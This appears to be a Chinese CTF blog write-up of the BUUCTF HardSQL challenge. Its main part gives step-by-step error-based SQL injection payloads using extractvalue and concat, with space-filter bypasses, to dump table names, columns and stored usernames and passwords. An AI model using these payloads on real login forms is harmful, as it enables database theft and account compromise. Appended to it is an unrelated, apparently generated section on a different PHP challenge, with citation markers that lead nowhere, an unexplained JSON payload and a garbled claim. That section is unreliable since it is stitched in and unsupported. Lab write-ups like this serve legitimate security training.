BUUCTF[极客大挑战 2019]HardSQL 详细思路

尝试万能密码看看

好像被过滤了,先尝试闭合

单引号闭合 ?username=admin&password=aaa'

根据报错得知应该是双引号闭合

?username=admin&password=aaa"

报错变为了密码不对

尝试了好多种注入但是都被拦截过滤了,用字典扫一下看看,有没有哪些没过滤

长度为789的就是被过滤了

大多关件注入字符都被过滤(所有能代替空格的全被过滤了)但是#的代替方式%23没被过滤,还可以尝试一下能不能正常登录的(把后面的密码注释掉)

payload=?username=admin'or(1)%23&password=aaa

登录进去了,但是没有反馈所以不能用之前的union联合查询了

思路也有了,就是基于系统报错的注入而且不用空格

他没有过滤EXTRACTVALUE函数 

因为该函数可携带详细报错信息(可以插入select语句)所以尝试使用该函数来构造报错查询

EXTRACTVALUE函数的完整语法是:

EXTRACTVALUE(xml_frag, xpath_expr)

***第一个参数理论上应该接收一个XML文档片段,但注入时我们故意传入1(非XML格式)

(真实XML需要严格格式(如<a>1</a>),构造复杂)

传入简单参数1能更快触发XPath解析错误

***第二个参数:表达式不符合语法规范时,MySQL会返回错误信息,而这个错误信息中会包含我们构造的查询结果。所以在第二个参数处插入查询语句

使用extractvalue函数进行注入的经典起手式: extractvalue(1,concat(0x7e,(select......  )))

【其中要用到concat函数,该函数用于拼接字符串,0x7e是~的16进制数 用于分隔查询结果】

有了思路 开始注入

  查库名:

不能用用空格,所以不用or 1=1 构造  换为or()来构造

payload=?username=admin'or(extractvalue(1,concat(0x7e,database(),0x7e)))%23&password=1

查表名:

之前一般的查询语句为 select table_name from information_schema.tables where table_schema=database() 但是在过滤空格的极端环境下我们要用其他符号来做分隔

用括号:select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))【要特别注意()是否闭合完全,不然后面报错特别难找】

payload=?username=admin1'or(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())))))%23&password=aaa

查字段:

payload=?username=admin1'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')))))%23&password=aaa

脱库:

payload=?username=admin1'or(extractvalue(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)))))%23&password=1

但发现显示不全,知道了前面的,那就从后面输出拼接一下

但是substr和mid函数被过滤了,试试left和right函数

payload=?username=admin1'or(extractvalue(1,concat(0x7e,(select(group_concat(right(password,20)))from(H4rDsq1)))))%23&password=1

两个输出拼接一下得到flag

### BUUCTF 2019 PHP Easy 题目分析 #### 背景介绍 BUUCTF 是国内知名的 CTF 平台之一,其题目涵盖了多种安全领域。其中 PHP 类型的题目通常涉及反序列化漏洞、输入验证不足等问题。以下是针对 **BUUCTF 2019 PHP Easy** 的可能解题思路。 --- #### 反序列化漏洞基础 在 PHP 中,`serialize()` 和 `unserialize()` 函数分别用于对象的序列化和反序列化操作。如果开发者未对用户可控的数据进行严格校验,则可能导致反序列化漏洞的发生[^1]。 通过构造恶意的对象并将其传递给程序中的 `unserialize()` 方法,攻击者可以触发预期之外的行为,例如执行任意代码或访问敏感数据。 --- #### php://filter 协议的应用 PHP 提供了一些伪协议来处理特定场景下的文件流操作。例如: - `php://input`: 获取原始 POST 数据。 - `php://filter`: 对数据流应用过滤器,常用于绕过某些防护机制或读取文件内容。 当目标环境允许使用这些伪协议时,可以通过它们实现一些有趣的操作,比如以 Base64 编码形式读取远程脚本的内容[^2]。 --- #### 字符串查找函数 mb_strpos() 该函数返回指定子字符串首次出现的位置索引。需要注意的是,默认情况下它区分小写;另外还可以自定义字符集编码参数 `$encoding` 来适配多字节字符的需求[^3]。 此知识点虽然看似简单,但在实际利用过程中可能会被用来检测是否存在非法字符或者定位注入点等位置信息。 --- #### Payload 构造实例 假设题目存在 JSON 输入解析环节,并且服务器端会对提交过来的数据结构做进一步逻辑判断。那么我们可以尝试如下 payload: ```json { "Information": { "year": "2022abc", "items": [ 0, ["a"], "c" ] } } ``` 上述例子展示了如何精心设计嵌套数组以及特殊字段组合而成的有效载荷[^4]。当然具体形态还需依据实际情况调整优化。 --- #### 综合思考与建议 基于以上理论知识和技术手段,解决此类问题的关键在于深入理解官方给出的功能模块及其潜在缺陷所在之处。同时也要善于运用各种工具辅助完成调试工作。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值